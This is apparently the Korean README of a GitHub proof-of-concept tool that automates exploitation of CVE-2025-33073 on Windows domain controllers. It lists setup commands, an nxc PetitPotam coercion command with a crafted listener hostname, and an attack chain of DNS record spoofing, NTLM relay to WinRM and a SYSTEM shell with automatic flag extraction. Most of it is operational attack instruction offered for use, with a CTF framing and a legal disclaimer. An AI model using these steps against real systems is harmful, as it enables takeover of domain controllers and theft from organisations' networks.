
DNSAdmins 권한과 WinRM이 활성화된 Windows 도메인 컨트롤러를 대상으로 하는 CVE-2025-33073 범용 익스플로잇 도구.

Windows 도메인 컨트롤러에서 DNSAdmins 권한과 WinRM이 활성화된 환경을 대상으로 하는 CVE-2025-33073 범용 익스플로잇 도구
CVE-2025-33073은 공격자가 Windows 도메인 컨트롤러에서 SYSTEM 수준의 코드 실행을 달성할 수 있게 해주는 치명적인 취약점으로, 다음과 같은 공격 조합을 사용합니다:
이 PoC는 모든 도메인, 모든 사용자 이름, 모든 CTF 환경과 호환되는 범용 자동화 익스플로잇 프레임워크를 제공합니다.
# 필요한 도구
sudo apt-get update
sudo apt-get install -y python3 python3-pip netcat-openbsd dnsutils
# Python 의존성
pip3 install impacket netexec
# krbrelayx 클론
git clone https://github.com/dirkjanm/krbrelayx
# 이 저장소 클론
git clone https://github.com/uziii2208/CVE-2025-33073
cd CVE-2025-33073
# 익스플로잇 실행 권한 부여
chmod +x exploit.sh
# 도구 설치 확인
./exploit.sh # 모든 의존성을 확인합니다
./exploit.sh
스크립트가 다음 정보를 요청합니다:
터미널 1 - 익스플로잇 실행:
./exploit.sh
# 대화형 프롬프트를 따릅니다
# "[!] RELAY READY! OPEN NEW TERMINAL → PASTE COERCE COMMAND!" 메시지를 기다립니다
터미널 2 - 강제 명령 실행 (터미널 1 출력에서 복사):
nxc smb 192.168.1.10 -u 'username' -p 'password' \
-M coerce_plus -o METHOD=PetitPotam LISTENER=localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA.corp.local
결과:
스크립트가 자동으로 검색 및 추출:
*flag*.txt*root*.txt*user*.txtproof.txt위치: C:\Users\*\Desktop\
모든 출력 저장 위치: /0pwn_exploit_<TIMESTAMP>/
relay.log - NTLM 릴레이 서버 출력dns.log - DNS 작업 로그shell_output.log - 셸 명령 및 추출된 플래그1. DNS 스푸핑 (krbrelayx.dnstool)
└─> 공격자 IP를 가리키는 DNS 레코드 수정/생성
2. NTLM 릴레이 서버 (ntlmrelayx.py)
└─> 들어오는 NTLM 인증 수신 대기
3. 강제 (nxc + PetitPotam)
└─> DC가 공격자 IP에 인증하도록 강제
4. 릴레이 → WinRMS
└─> 대상 WinRMS로 인증 릴레이
5. SYSTEM 셸
└─> SYSTEM으로 명령 실행
6. 자동 플래그 추출
└─> 모든 플래그 검색 및 추출
exploit.sh에서 LONGHOST 변수 편집:
LONGHOST="localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA"
run_shell_commands() 함수를 수정하여 다른 파일 패턴 검색:
# 여기에 사용자 정의 패턴 추가
echo "powershell \"Get-ChildItem -Path 'C:\\Users\\*\\Desktop' -Include '*custom*.txt' ...\""
이 PoC는 다음 용도로 제공됩니다:
허가되지 않은 컴퓨터 시스템 접근은 불법입니다.
net group "DNSAdmins" /domainping <DC_IP>nxc smb <DC_IP> -u username -p passwordwinrm quickconfigshell_output.log에서 오류 확인nc -zv 127.0.0.1 <SHELL_PORT>run_shell_commands()에서 sleep 타임아웃 증가/0pwn_exploit_1234567890/
├── relay.log # NTLM 릴레이 서버 출력
├── dns.log # DNS 작업 세부 정보
└── shell_output.log # 추출된 플래그 및 명령 출력
# 릴레이 이벤트 보기
grep "SYSTEM SHELL" /0pwn_exploit_*/relay.log
# 모든 플래그 추출
grep "===" /0pwn_exploit_*/shell_output.log -A 10
# DNS 작업 확인
cat /0pwn_exploit_*/dns.log
[데모 및 스크린샷] - [곧 제공 예정]

0pwn (uziii2208) - 원본 개념 및 연구 AI 개선 - v1.0 개선 사항 및 자동 플래그 추출
MIT 라이선스 - 자세한 내용은 LICENSE 파일 참조
법적 고지:
이 소프트웨어는 교육 목적 및 승인된 보안 테스트 용도로만 제공됩니다. 허가되지 않은 컴퓨터 시스템 접근은 불법이며 법적 처벌을 받을 수 있습니다.
이 도구를 사용함으로써 귀하는 다음에 동의하는 것으로 간주됩니다:
기여를 환영합니다! 이슈 및 풀 리퀘스트를 제출해 주세요.
문제, 질문 또는 개선 사항이 있는 경우:
상태: ✅ 테스트 완료 및 확인 버전: 1.0 (범용) 마지막 업데이트: 2025